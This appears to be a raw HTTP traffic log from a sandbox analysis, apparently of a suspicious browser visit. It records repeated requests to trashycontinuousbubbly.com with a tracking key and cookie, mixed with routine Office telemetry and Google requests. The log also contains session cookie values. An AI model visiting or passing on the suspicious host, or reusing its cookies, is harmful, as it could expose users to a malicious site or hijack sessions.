Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /images/branding/googlelogo/1x/googlelogo_color_272x92dp.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq03GfTpx8M4Jd9pdHvRuun79QVjYMaNk1uYO9gKLxoj3evRLcUYw; NID=518=hx4NEOILpI80dBbgrrGm129tv0HDtsaX_FhoqZ-zD6BREcbkIVxvppaPAYGiTpY--TS0F0o3FbdxHHxs3gzlCnHln9xLDu9L6Yk05bBHfAmNa_v5zrN0y8ofjRA7GUq-F-9_Qu3PrY4ACol0CWWW1Ok71RVqJ2q-ICtiEzq5KefXSrYUsjB3kxK6IvCRB1N5Zn4
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.Ha-Xy1r_mr4.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAYAAABAAAAAAAgAAAAAAAAAAoQAQRAAAAQAAAAsAAAQCACAAAAEBAAABAB4lCkAAiQAAAAAAAgAEAAAAAACAABAAAAAAAAAQAEAAAAAAAIAAAAAAAAAgYAAAAAAAAAAAAAAAQAA6AEAAAAAQABAEAAAhoABCCAAAAAAANAHAMEDMKSwAAAAAAAAAAAAAAAACJAgmAsJKAhAAAAAAAAAAAAAAAAAAACRJi5s/d=1/ed=1/dg=3/br=1/rs=ACT90oGGWpbgHW_1tWSGsne1LX3PgXpInw/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DULqB:RKfG5c;Dkk6ge:JZmW9e;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LXA8b:q7OdKd;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;OohIYe:mpEAQb;Pjplud:EEDORb,PoEs9b;Q1Ow7b:x5CSu;Q6C5kf:pfdZCe;QGR0gd:Mlhmy;R2kc8b:ALJqWb;R4IIIb:QWfeKf;R9Ulx:CR7Ufe;RDNBlf:zPRCJb;SLtqO:Kh1xYe;SMDL4c:fTfGO,fTfGO;SNUn3:ZwDk9d,x8cHvb;ScI3Yc:e7Hzgb,e7Hzgb;ShpF6e:N0pvGc;SzQQ3e:dNhofb;TxfV6d:YORN0b;U96pRd:FsR04;UBKJZ:LGDJGb;UDrY1c:eps46d;UVmjEd:EesRsb;UVzb9c:IvPZ6d;UyG7Kb:wQd0G;V2HTTe:RolTY;VGRfx:VFqbr;VN6jIc:ddQyuf;VOcgDe:YquhTb;VsAqSb:PGf2Re;VxQ32b:k0XsBb;WCEKNd:I46Hvd;WDGyFe:jcVOxd;Wfmdue:g3MJlb;XUezZ:sa7lqb;YIZmRd:A1yn5d;YV5bee:IvPZ6d;YkQtAf:rx8ur;ZSH6tc:QAvyLe;ZWEUA:afR4Cf;ZlOOMb:P0I0Ec;a56pNe:JEfCwb;aAJE9c:WHW6Ef;aCJ9tf:qKftvc;aZ61od:arTwJ;af0EJf:ghinId;bDXwRe:UsyOtc;bcPXSc:gSZLJb;cEt90b:ws9Tlc;cFTWae:gT8qnd;coJ8e:KvoW8;dIoSBb:ZgGg9b;dLlj2:Qqt3Gf;dowIGb:ebZ3mb,ebZ3mb;dtl0hd:lLQWFe;eBAeSb:Ck63tb;eBZ5Nd:audvde;eHDfl:ofjVkb;eO3lse:nFClrf;euOXY:OZjbQ;g8nkx:U4MzKc;gaub4:TN6bMe;gtVSi:ekUOYd;h3MYod:cEt90b;hK67qb:QWEO5b;heHB1:sFczq;hjRo6e:F62sG;hsLsYc:Vl118;iFQyKf:QIhFr,vfuNJf;imqimf:jKGL2e;jY0zg:Q6tNgc;k2Qxcb:XY51pe;kCQyJ:ueyPK;kMFpHd:OTA3Ae;kbAm9d:MkHyGd;lOO0Vd:OTA3Ae;nAFL3:NTMZac,s39S4;nJw4Gd:dPFZH;oGtAuc:sOXFj;oSUNyd:fTfGO,fTfGO;oUlnpc:RagDlc;oVHXxc:HODIOb;okUaUd:wItadb;pKJiXd:VCenhc;pNsl2d:j9Yuyc;pXdRYb:JKoKVe;pj82le:ww04Df;qZx2Fc:j0xrE;qaS3gd:yiLg6e;qafBPd:sgY6Zb;qavrXe:zQzcXe;qddgKe:d7YSfd,x4FYXe;rQSrae:C6D5Fc;ropkZ:UT1DG;sTsDMc:kHVSUb;sZmdvc:rdGEfc;tH4IIe:Ymry6;tosKvd:ZCqP3;trZL0b:qY8PFe;uuQkY:u2V3ud;vEYCNb:FaqsVd;vGrMZ:lPJJ0c;vfVwPd:lcrkwe;w3bZCb:ZPGaIb;w4rSdf:XKiZ9;w9w86d:dt4g2b;wQlYve:aLUfP;wR5FRb:O1Gjze,TtcOte;wV5Pjc:L8KGxe;xBbsrc:NEW1Qc;ysNiMc:CpIBjd;yxTchf:KUM7Z;z97YGf:oug9te;zOsCQe:Ko78Df;zaIgPb:Qtpxbd/m=cdos,hsm,jsa,mb4ZUb,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl,d,csi HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platf
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
